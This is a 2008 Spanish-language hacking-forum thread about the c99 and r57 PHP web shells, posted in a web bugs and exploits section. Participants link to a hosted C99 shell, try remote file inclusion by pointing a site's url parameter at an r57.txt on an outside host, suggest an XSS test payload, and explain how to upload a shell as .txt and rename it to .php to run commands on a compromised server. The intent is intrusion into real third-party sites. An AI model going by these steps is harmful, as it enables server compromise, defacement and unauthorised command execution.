elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  c99.txt y r57.txt
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: c99.txt y r57.txt  (Leído 17,011 veces)
Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
c99.txt y r57.txt
« en: 30 Mayo 2008, 18:15 pm »

quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #1 en: 30 Mayo 2008, 18:24 pm »

Sí que funcionan.
Esas 2 son las mejores para mi parecer, las únicas que he probado realmente xd

y sabes lo que es una shell? porque esa duda del troyano no me concuerda mucho *-)

aquí la c99:
http://usuarios.lycos.es/elitehacknet/C99Shell.txt

no sé qué versión es como que van sacando que si privadas o no se qué.... y ya no practico nada de defacing ni esas cosas....

salu2!
En línea

Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #2 en: 30 Mayo 2008, 18:35 pm »

se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo.

alguien me podria decir porque esto funciona:

php?url=www.google.com

y esto no funciona

php?url=usuarios.lycos.es/theripperm/shell/r57.txt

este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?

 :huh: :huh: :huh:
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #3 en: 30 Mayo 2008, 18:53 pm »

Citar
porque dice url, y quizas deberia decir page o file ? o algo asi?
eso no tiene nada que ver ¬¬
es la variable que llama a la página o archivo interno
como si se llamara "caquita" xd

por PM ya te dije añade un "?" al final porque si no lo lee como texto, a ver si te funciona,

salu2!
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #4 en: 30 Mayo 2008, 20:08 pm »

Y seguro que es vulnerable?

no es inclusion por iframes? ;D

Suele pasar :P

checa si en lugar de hacer include con php sea con iframes, o frames :P
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #5 en: 30 Mayo 2008, 20:42 pm »

ya, a lo mejor como dice Azielito no es vulnerable y simplemente abre la página de manera externa y no lo ejecuta en el propio servidor, ¿sabes?

salu2

pd , ya te digo prueba de poner "?" al final
En línea

Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Re: c99.txt y r57.txt
« Respuesta #6 en: 30 Mayo 2008, 22:41 pm »

mm todavia con el ? al final no funciona, seguro que no es vulnerable.  :P

Y seguro que es vulnerable?

no es inclusion por iframes? ;D

Suele pasar :P

checa si en lugar de hacer include con php sea con iframes, o frames :P

como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas.

me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis

Citar
<html><head><title>www.google.com</title></head><frameset rows="100,*" frameborder="0" border="0" framespacing="0"><frame noresize="noresize" src="allc_header.php?url=www.google.com" scrolling=no marginwidth=0 marginheight=0><frame src=http://www.google.com><noframes>Your browser does not support frames. allc.com uses frames to display results.  You can view the <a href=http://www.google.com>referring page</a> </noframes></frameset></html>

si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google?

ah y de verdad muchas gracias a los dos por darme una mano  ;D ;D ;D
« Última modificación: 30 Mayo 2008, 22:43 pm por Achernar » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #7 en: 30 Mayo 2008, 23:16 pm »

si esta dentro de un frame no es vulnerable a RFI pero podria ser a XSS

inenta poner en tu variable
Código
  1. ><script>alert(document.location);</script>

hay bastante informacion sobre XSS en el foro, ahora recuerdo estos

http://foro.elhacker.net/tutoriales_documentacion/xss_finalversion_txt-t114432.0.html
http://foro.elhacker.net/tutoriales_documentacion/tutorial_ataques_xss-t32042.0.html
http://foro.elhacker.net/tutoriales_documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html

:)
En línea

ulises2k

Desconectado Desconectado

Mensajes: 7



Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #8 en: 31 Mayo 2008, 00:27 am »

Hola vamos a aclarar algunas cosas.

Creo que a lo que le llamas troyano es a los tipicos troyanos de windows. Programas ejecutables.

Estas (c99 y r57) son shell web.
Estas 2 en este caso son aplicaciones php que te dan funcionales que la podriamos meter en la categoria de shell ya que podes correr comandos en el servidor donde esten corriendo, por lo general linux.

Como toda aplicacion web, esta corre con los permisos que corre el servidor web, que por lo general es apache o lighttpd.

Por esta ultima razon segun con que user corra el webserver, por lo general como "nobody", tienes muy poco permiso para "hacer cosas"

La shell por lo general cuando la quieras subir para comprometer un servidor, la renombras a .txt porque si en el server donde esta interpreta los .php, lo que obtenes cuando la quieras subir al servidor comprometido es la interpretacion del .php que es una pagina web y no el sourcecode el php, por eso al renombrar la shell a .txt no se interpreta, y subes al server comprometido todo el codigo .php

Luego que subiste la shell al server comprometido, renombras el .txt a .php e ingresas por http o https a la shell y obtendras una interface para "hacer cosas" en el server.

Instalate un Apache+php en una VM y probalas.







En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: c99.txt y r57.txt
« Respuesta #9 en: 31 Mayo 2008, 15:11 pm »

gracias por la clase sobre shells ulises xd

@Achernar dinos pues si es vulnerable a XSS a ver....
porque como bien dice azielito siendo frame se ejecuta en tu servidor y no en el víctima, o sea que la shell de ná sirve.

salu2
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines